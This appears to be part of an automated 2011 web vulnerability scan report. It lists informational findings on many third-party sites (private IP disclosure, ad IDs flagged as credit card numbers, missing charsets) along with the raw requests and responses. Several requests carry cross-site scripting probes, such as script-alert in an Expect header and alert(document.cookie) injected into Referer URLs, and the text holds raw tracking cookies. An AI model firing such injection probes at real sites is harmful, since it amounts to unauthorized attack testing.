Top Stories - NY1.com
</title><meta
...[SNIP]...
<span id="ctl00_lblServerInfo" class="hideOnPrint" style="color:White;background-color:White;">10.11.12.232</span>
...[SNIP]...

14.11. http://www.psasurveys.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.psasurveys.com
Path:	/favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

172.17.2.192

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.psasurveys.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Server: Varnish
X-Varnish: 1038310606
Retry-After: 0
X-Cache: MISS
Content-Type: text/html; charset=utf-8
Date: Fri, 01 Apr 2011 16:51:06 GMT
Via: 1.1 varnish 172.17.2.192
Connection: Keep-Alive
Age: 0
Content-Length: 485

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>417 Expectation Failed
...[SNIP]...

14.12. http://www.pscufs.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pscufs.com
Path:	/favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

172.17.34.210

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.pscufs.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Server: Varnish
X-Varnish: 1851846750
Retry-After: 0
X-Cache: MISS
Content-Type: text/html; charset=utf-8
Date: Fri, 01 Apr 2011 16:43:02 GMT
Via: 1.1 varnish 172.17.34.210
Connection: Keep-Alive
Age: 0
Content-Length: 485

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>417 Expectation Failed
...[SNIP]...

14.13. http://www.queerty.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.queerty.com
Path:	/favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

172.17.2.192

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.queerty.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Server: Varnish
X-Varnish: 1034412111
Retry-After: 0
X-Cache: MISS
Content-Type: text/html; charset=utf-8
Date: Fri, 01 Apr 2011 15:37:22 GMT
Via: 1.1 varnish 172.17.2.192
Connection: Keep-Alive
Age: 0
Content-Length: 485

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>417 Expectation Failed
...[SNIP]...

14.14. http://www.thoughtprojects.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.thoughtprojects.com
Path:	/favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

172.17.3.23

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thoughtprojects.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Server: Varnish
X-Varnish: 1707946799
Retry-After: 0
X-Cache: MISS
Content-Type: text/html; charset=utf-8
Date: Fri, 01 Apr 2011 15:36:55 GMT
Via: 1.1 varnish 172.17.3.23
Connection: Keep-Alive
Age: 0
Content-Length: 485

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>417 Expectation Failed
...[SNIP]...

14.15. http://www.tvseriesfinale.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tvseriesfinale.com
Path:	/favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

172.17.34.210

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tvseriesfinale.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Server: Varnish
X-Varnish: 1850941326
Retry-After: 0
X-Cache: MISS
Content-Type: text/html; charset=utf-8
Date: Fri, 01 Apr 2011 15:53:57 GMT
Via: 1.1 varnish 172.17.34.210
Connection: Keep-Alive
Age: 0
Content-Length: 485

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>417 Expectation Failed
...[SNIP]...

15. Credit card numbers disclosed previous next
There are 3 instances of this issue:

http://a.collective-media.net/adj/ns.androidtapp/general
http://pubads.g.doubleclick.net/gampad/ads
http://s.aeriagames.com/misc/ads/error_banner_en.html

15.1. http://a.collective-media.net/adj/ns.androidtapp/general previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/ns.androidtapp/general

Issue detail

The following credit card number was disclosed in the response:

4522430587094277

Request

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 456
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:15:10 GMT
Connection: close
Set-Cookie: dc=dc-dal-sea; domain=collective-media.net; path=/; expires=Sun, 01-May-2011 18:15:10 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/ns.androidtapp/general;ppos=atf;kw=;tile=2;sz=300x250,300x600;net=ns;ord=4522430587094277;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

15.2. http://pubads.g.doubleclick.net/gampad/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pubads.g.doubleclick.net
Path:	/gampad/ads

Issue detail

The following credit card number was disclosed in the response:

6539975516782356

Request

GET /gampad/ads?correlator=1301681874603&output=json_html&callback=GA_googleSetAdContentsBySlotForSync&impl=s&client=ca-pub-6539975516782356&slotname=US_ErrorPage_530x175&page_slots=US_ErrorPage_530x175&cookie_enabled=1&cdm=s.aeriagames.com&url=http%3A%2F%2Fwww.aeriagames.com%2Ffavicon.icof51ac%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E26b262688fc&ref=http%3A%2F%2Fwww.aeriagames.com%2Ffavicon.icof51ac%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E26b262688fc&lmt=1298492863&dt=1301681874604&biw=-12245933&bih=-12245933&ifi=1&ifk=1933602246&adk=3656910612&u_tz=-300&u_his=2&u_java=true&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&flash=10.2.154&gads=v2&ga_vid=1988789664.1301681875&ga_sid=1301681875&ga_hid=1436773593 HTTP/1.1
Host: pubads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://s.aeriagames.com/misc/ads/error_banner_en.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TMedia=Coun%3ANA/Postal%3ANA/; TMediaISP=SoftLayer%20Technologies; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __utmz=251550727.1300542524.1.1.utmcsr=mgid.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=251550727.1167224488.1300542524.1300542524.1300542524.1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

15.3. http://s.aeriagames.com/misc/ads/error_banner_en.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://s.aeriagames.com
Path:	/misc/ads/error_banner_en.html

Issue detail

The following credit card number was disclosed in the response:

6539975516782356

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html
Accept-Ranges: bytes
ETag: "1087020324"
Last-Modified: Wed, 23 Feb 2011 14:27:43 GMT
Server: Aeria Games & Entertainment
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:17:16 GMT
Content-Length: 750
Connection: close

<!DOCTYPE HTML>
<html lang="en-us">
   <head>
       <meta http-equiv="Content-type" content="text/html; charset=utf-8" />
       <style type="text/css" media="screen"></style>
       <script type='text/javascri
...[SNIP]...
<script type='text/javascript'>
           GS_googleAddAdSenseService("ca-pub-6539975516782356");
           GS_googleEnableAllServices();
       </script>
...[SNIP]...
<script type='text/javascript'>
           GA_googleAddSlot("ca-pub-6539975516782356", "US_ErrorPage_530x175");
       </script>
...[SNIP]...

16. HTML does not specify charset previous next
There are 138 instances of this issue:

http://ad.doubleclick.net/adi/N3941.5122.NY1/B5147666.2
http://ad.doubleclick.net/pfadx/aeriagames_cim/
http://ds.addthis.com/red/psi/sites/dogpile.com/p.json
http://ds.addthis.com/red/psi/sites/www.dogpile.com/p.json
http://fls.doubleclick.net/activityi
http://uac.advertising.com/wrapper/aceUACping.htm
http://view.c3metrics.com/c3VTabstrct-6-2.php
http://view.c3metrics.com/v.js
http://www.4jobs.com/favicon.ico
http://www.800adfrenzy.com/favicon.ico
http://www.accessmycardonline.com/favicon.ico
http://www.activediner.com/favicon.ico
http://www.aeriagames.com/favicon.ico
http://www.affairsclub.com/favicon.ico
http://www.afterellen.com/favicon.ico
http://www.allthumbshost.com/favicon.ico
http://www.amazingfreerewards.com/favicon.ico
http://www.amazingrewardsonline.com/favicon.ico
http://www.americajob.com/favicon.ico
http://www.artsonia.com/favicon.ico
http://www.asset-cache.net/favicon.ico
http://www.astrocenter.com/favicon.ico
http://www.athletic.net/favicon.ico
http://www.auctionmicro.com/favicon.ico
http://www.bakati.com/favicon.ico
http://www.barelist.com/favicon.ico
http://www.betus.com/favicon.ico
http://www.biblestudytools.com/favicon.ico
http://www.big5sportinggoods.com/favicon.ico
http://www.bittybitznpieces.com/favicon.ico
http://www.bizbuysell.com/favicon.ico
http://www.blockbusterexpress.com/favicon.ico
http://www.bradsdeals.com/favicon.ico
http://www.bravoatk.com/favicon.ico
http://www.brownells.com/favicon.ico
http://www.buildacareer.net/favicon.ico
http://www.cambridge.org/date/writeYear_js.asp
http://www.cambridge.org/uk/date/writeYear_js.asp
http://www.careerplanner.com/favicon.ico
http://www.caring4cancer.com/favicon.ico
http://www.carsforsale.com/favicon.ico
http://www.cdn-businessweek.com/favicon.ico
http://www.cdn-thestreet.com/favicon.ico
http://www.centerpointenergy.com/favicon.ico
http://www.cheaperthandirt.net/favicon.ico
http://www.cheapostay.com/favicon.ico
http://www.clipartcastle.com/favicon.ico
http://www.codeplex.com/favicon.ico
http://www.covers.com/favicon.ico
http://www.custom404error.com/favicon.ico
http://www.dailytech.com/favicon.ico
http://www.demovirgins.net/favicon.ico
http://www.diapers.com/favicon.ico
http://www.dinodirect.com/favicon.ico
http://www.dltk-holidays.com/favicon.ico
http://www.ebaycoupon.us/favicon.ico
http://www.foodnetworkstore.com/favicon.ico
http://www.freebie-fusion.net/favicon.ico
http://www.frontdoor.com/favicon.ico
http://www.funnygranny.com/favicon.ico
http://www.galsarchive.com/favicon.ico
http://www.giggidy.com/favicon.ico
http://www.grammarbook.com/favicon.ico
http://www.gsnrecipes.com/favicon.ico
http://www.halloweenexpress.com/favicon.ico
http://www.hometeamsonline.com/favicon.ico
http://www.hotfile.com/favicon.ico
http://www.hqtoplist.com/favicon.ico
http://www.iforex.com/favicon.ico
http://www.iframes.us/favicon.ico
http://www.installiq.com/favicon.ico
http://www.installiqlearnmore.com/favicon.ico
http://www.insureme.com/favicon.ico
http://www.interweave.com/favicon.ico
http://www.jobappnetwork.com/favicon.ico
http://www.jobvite.com/favicon.ico
http://www.justppc.net/favicon.ico
http://www.k12jobspot.com/favicon.ico
http://www.kevinsmoneytree.org/favicon.ico
http://www.latinateens-blog.com/favicon.ico
http://www.leapfish.com/favicon.ico
http://www.lilumania.in/favicon.ico
http://www.mail2web.com/favicon.ico
http://www.maison-de-la-france.com/favicon.ico
http://www.maps.com/favicon.ico
http://www.massagegirls18.net/favicon.ico
http://www.meaning-of-names.com/favicon.ico
http://www.melaleuca.com/favicon.ico
http://www.metapress.com/favicon.ico
http://www.moneyzue.com/favicon.ico
http://www.mt.gov/favicon.ico
http://www.mydigitalpublication.com/favicon.ico
http://www.myhealthwealthandhappiness.com/favicon.ico
http://www.myhuckleberry.com/favicon.ico
http://www.newretirement.com/favicon.ico
http://www.news-medical.net/favicon.ico
http://www.newssearchonline.com/favicon.ico
http://www.nwf.org/favicon.ico
http://www.optimalfusion.com/favicon.ico
http://www.oview.com/favicon.ico
http://www.owners.com/favicon.ico
http://www.paulsnetwork.com/favicon.ico
http://www.personalizationmall.com/favicon.ico
http://www.printfree.com/favicon.ico
http://www.prize-pending.com/favicon.ico
http://www.quickyellow.com/favicon.ico
http://www.quizbar.net/favicon.ico
http://www.rcuniverse.com/favicon.ico
http://www.redrobin.com/favicon.ico
http://www.roirocket.com/favicon.ico
http://www.rubytuesday.com/favicon.ico
http://www.sanityswitch.com/favicon.ico
http://www.santanderconsumerusa.com/favicon.ico
http://www.scriptpulse.com/favicon.ico
http://www.searchzue.com/favicon.ico
http://www.seekysearch.net/favicon.ico
http://www.smartquote.com/favicon.ico
http://www.soap.com/favicon.ico
http://www.southwestvacations.com/favicon.ico
http://www.starbucksstore.com/favicon.ico
http://www.sulekha.com/favicon.ico
http://www.sun.com/favicon.ico
http://www.super-survey.com/favicon.ico
http://www.teenchat.com/favicon.ico
http://www.tennis-warehouse.com/favicon.ico
http://www.toonier.com/favicon.ico
http://www.tstickets.com/favicon.ico
http://www.tubedspots.com/favicon.ico
http://www.turbolovervidz.com/favicon.ico
http://www.ultra18.com/favicon.ico
http://www.usairwaysvacations.com/favicon.ico
http://www.venus.com/favicon.ico
http://www.w3i.com/favicon.ico
http://www.web.com/favicon.ico
http://www.williamsauction.com/favicon.ico
http://www.yellowusa.com/favicon.ico
http://www.youngcourtesans.com/favicon.ico
http://www.yourdegree.com/favicon.ico

16.1. http://ad.doubleclick.net/adi/N3941.5122.NY1/B5147666.2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3941.5122.NY1/B5147666.2

Request

Response

16.2. http://ad.doubleclick.net/pfadx/aeriagames_cim/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/pfadx/aeriagames_cim/

Request

GET /pfadx/aeriagames_cim/;position=1;AA=1;AB=5;AD=1;AF=1;AH=5;AI=5;AJ=1;AK=1;AL=5;AM=5;AN=5;AQ=1;AR=5;AS=5;AT=1;AU=1;ic17=1;ic22=1;ic16=1;ic12=1;ic24=1;ic10=1;ac17=1;ac14=1;ac10=1;pc2=1;pc1=1;ac2=1;ic3=1;ic2=1;ic6=1;ic5=1;ic19=1;ac16=1;ac12=1;pc4=1;ic9=1;ac5=1;ic1=1;ac8=1;AP=5;ac15=1;ac18=1;ac3=1;ac1=1;ac7=1;ic18=1;ic11=1;sz=24x24;dcmt=text/html;ord=1301681877456? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.aeriagames.com/meebo.html?network=aeriagames&lang=en
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 1109
DCLK_imp: v7;x;239191308;0-0;1;45214787;24/24;41391790/41409577/1;;~aopt=2/0/36/0;~okv=;position=1;AA=1;AB=5;AD=1;AF=1;AH=5;AI=5;AJ=1;AK=1;AL=5;AM=5;AN=5;AQ=1;AR=5;AS=5;AT=1;AU=1;ic17=1;ic22=1;ic16=1;ic12=1;ic24=1;ic10=1;ac17=1;ac14=1;ac10=1;pc2=1;pc1=1;ac2=1;ic3=1;ic2=1;ic6=1;ic5=1;ic19=1;ac16=1;ac12=1;pc4=1;ic9=1;ac5=1;ic1=1;ac8=1;AP=5;ac15=1;ac18=1;ac3=1;ac1=1;ac7=1;ic18=1;ic11=1;sz=24x24;dcmt=text/html;~cs=g
Date: Fri, 01 Apr 2011 18:17:21 GMT
Vary: Accept-Encoding
Expires: Fri, 01 Apr 2011 18:17:21 GMT
Cache-Control: private, x-gzip-ok=""

DoubleClick.onAdLoaded('MediaAlert',{"impression":"http://ad.doubleclick.net/imp;v7;x;239191308;0-0;1;45214787;24/24;41391790/41409577/1;;~aopt=2/0/36/0;~okv=;position=1;AA=1;AB=5;AD=1;AF=1;AH=5;AI=5;
...[SNIP]...

16.3. http://ds.addthis.com/red/psi/sites/dogpile.com/p.json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ds.addthis.com
Path:	/red/psi/sites/dogpile.com/p.json

Request

GET /red/psi/sites/dogpile.com/p.json?callback=_ate.ad.hpr&uid=4d5af32c71c2e1a5&url=http%3A%2F%2Fdogpile.com%2Fdogpile%2Fws%2Findex%2Fqcat%3Dwp%2F_iceUrlFlag%3D11%3F_IceUrl%3Dtrue&ref=http%3A%2F%2Fdogpile.com%2Fdogpile%2Fws%2Fpreferences%2Frfcid%3D415%2Frfcp%3DTopNavigation%2F_iceUrlFlag%3D11%3F_IceUrl%3Dtrue&1rfxqqq HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh36.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; psc=4; di=%7B%222%22%3A%223375925924%2CrcHW801b0RcADNFE%22%7D..1301343580.60|1301343580.1FE|1300446510.66|1299801259.19A; dt=X; uid=4d5af32c71c2e1a5

Response

HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Length: 157
Content-Type: text/html
Set-Cookie: bt=; Domain=.addthis.com; Expires=Fri, 01 Apr 2011 16:55:54 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Sun, 01 May 2011 16:55:54 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Fri, 01 Apr 2011 16:55:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 01 Apr 2011 16:55:54 GMT
Connection: close
Vary: Accept-Encoding

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (500 Internal Server Error) has occured in response to this request.
</BODY>
</HTML>

16.4. http://ds.addthis.com/red/psi/sites/www.dogpile.com/p.json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ds.addthis.com
Path:	/red/psi/sites/www.dogpile.com/p.json

Request

GET /red/psi/sites/www.dogpile.com/p.json?callback=_ate.ad.hpr&uid=4d5af32c71c2e1a5&url=http%3A%2F%2Fwww.dogpile.com%2Fdogpile_other%2Fws%2Findex&ref=http%3A%2F%2Fwww.dogpile.com%2Fdogpile_other%2Fws%2Ffaq%2F_iceUrlFlag%3D11%3F_IceUrl%3Dtrue&hf6nkr HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh36.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; dt=X; di=%7B%222%22%3A%223375925924%2CrcHW801b0RcADNFE%22%7D..1301676954.1FE|1301676954.60|1299801259.19A|1300446510.66; psc=4; uid=4d5af32c71c2e1a5

Response

HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Length: 157
Content-Type: text/html
Set-Cookie: bt=; Domain=.addthis.com; Expires=Fri, 01 Apr 2011 16:56:28 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Sun, 01 May 2011 16:56:28 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Fri, 01 Apr 2011 16:56:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 01 Apr 2011 16:56:28 GMT
Connection: close
Vary: Accept-Encoding

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (500 Internal Server Error) has occured in response to this request.
</BODY>
</HTML>

16.5. http://fls.doubleclick.net/activityi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fls.doubleclick.net
Path:	/activityi

Request

GET /activityi;src=733866;type=vgra2010;cat=visit;ord=1;num=7892341297119.855? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.viagra.com/favicon.ico?92bef'-alert(document.cookie)-'af112dd110f=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; BE_CLA=p_id%3D2L8PRN68LAAPR28ANNL404NJ22AH628422%26p_last_ref%3Dhttp%253A//quickbooksonline.intuit.com/bookkeeping-accounting-systems/%253Fsc%253DQBC-V51-SUF-HMEPGE%26s_entry%3Dhttp%253A//fls.doubleclick.net/activityi%253Bsrc%253D1996823%253Btype%253Dfmsco864%253Bcat%253Dqbosi086%253Bord%253D1%253Bnum%253D7793246807996.184%253F%26p_first_ref%3Dhttp%253A//quickbooksonline.intuit.com/bookkeeping-accounting-systems/%253Fsc%253DQBC-V51-SUF-HMEPGE%26p_first_entry%3Dhttp%253A//fls.doubleclick.net/activityi%253Bsrc%253D1996823%253Btype%253Dfmsco864%253Bcat%253Dqbosi086%253Bord%253D1%253Bnum%253D7793246807996.184%253F%26s_expire%3D1300726794236%26s_id%3DJL8PRN68LAAPRJP844P404NJ22AH628422; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Fri, 01 Apr 2011 17:28:11 GMT
Expires: Fri, 01 Apr 2011 17:28:11 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
Content-Length: 194
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"></body></html>

16.6. http://uac.advertising.com/wrapper/aceUACping.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://uac.advertising.com
Path:	/wrapper/aceUACping.htm

Request

GET /wrapper/aceUACping.htm HTTP/1.1
Host: uac.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.ny1.com/favicon.ico?80003'-alert(1)-'46fe3f653ad=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=er080012979743200010; aceRTB=rm%3DThu%2C%2021%20Apr%202011%2022%3A04%3A42%20GMT%7Cam%3DThu%2C%2021%20Apr%202011%2022%3A04%3A42%20GMT%7Cdc%3DThu%2C%2021%20Apr%202011%2022%3A04%3A42%20GMT%7Can%3DThu%2C%2021%20Apr%202011%2022%3A04%3A42%20GMT%7Crub%3DMon%2C%2018%20Apr%202011%2013%3A48%3A43%20GMT%7C; GUID=MTMwMTQyNTY1NDsxOjE2bHNxaWkxbjFhM2NyOjM2NQ; C2=TUhlNZK9CYVVGxgAaVlRMIpwHg02FT1BdbdxUdgohXMVHgZ4FT1BkFexUdgihXMVHgimGT1BZGexUdw7NYMVHMa4FT1BAGexUdAmoZMVH8fFGT1BmMqxUdA3WaMVH0NYGT1BSGexUdwnhXMVHERoGT1BC9qxUdAadaMVHQYrGTlrrUgj/ZsowmrBMKphCgpDBwU+FYXAHZfh3DbJBcYjGFipIIQ6/YIVwuLATKphS3adHoXdGsprMFwPAaYewKPAqNphv3qfe0xqGL/sdXgWqagrs64AK+mBn7a+DM5iGLPpuUgG2Y0Aj5QiGtzsmZwoka4Lm+XB9LlxVJ74FYooGuqsjVADga4qCKSB9mUBuGZAGAazFdiZmjoBoGKvGcuKG+Sj0jw+NXAcee6BFchxFB; F1=BwRFW2EBAAAABAAAAUAAgEA; BASE=gKQkhmhBfm6pxP7QyqdoGxQlbe4D2JSiK3beIXeW+zhNiD6KRzqBlEvPZlZ2ZV59SmPiE0fq66jd+saN2nzQbpMiku2HRKGBuTHZpLN6Bibf+CBjFPcN8w1t4YpIfQcBW64hlANijfzE+S7Y9CQV5EWCmrVl/UwAg4xuyLz2pDmNEmRuRJeIfrUYpkoHQp4JMnZo7V+CxYPm/bXFfJetNJeSKvs26+zh4vILJJ2IZfSHoco6RuzRxO1yE5r2rDh660pKMqJe7HWYQhVoqqdkNzXwm0jnLhLqlPZs1jT005aL4js+Lazar6O!; ROLL=AfAib6Nga0dM2aDL/oJpfu+3b1ZWiJlFnus7ma5xiT4NQCL!

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2
Accept-Ranges: bytes
Cache-Control: max-age=86400
Expires: Sat, 02 Apr 2011 17:26:06 GMT
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV"
Content-Type: text/html
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:10:40 GMT
Content-Length: 2793
Connection: close

<html><head></head><body><script type='text/javascript'>
// pingArray['cookieValue'] = ['extra_tag_property_name', 'matching pixel called']
var pingArray = new Array();
pingArray['rm'] = ['rmcpmprice
...[SNIP]...

16.7. http://view.c3metrics.com/c3VTabstrct-6-2.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://view.c3metrics.com
Path:	/c3VTabstrct-6-2.php

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.ny1.com/favicon.ico?80003'-alert(1)-'46fe3f653ad=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=15400897811300976568; 480-VT=drive_03-24-2011-14-22-48_15008318461300976568ZZZZadver_03-28-2011-19-48-35_18309878591301341715

Response

16.8. http://view.c3metrics.com/v.js previous next

Summary

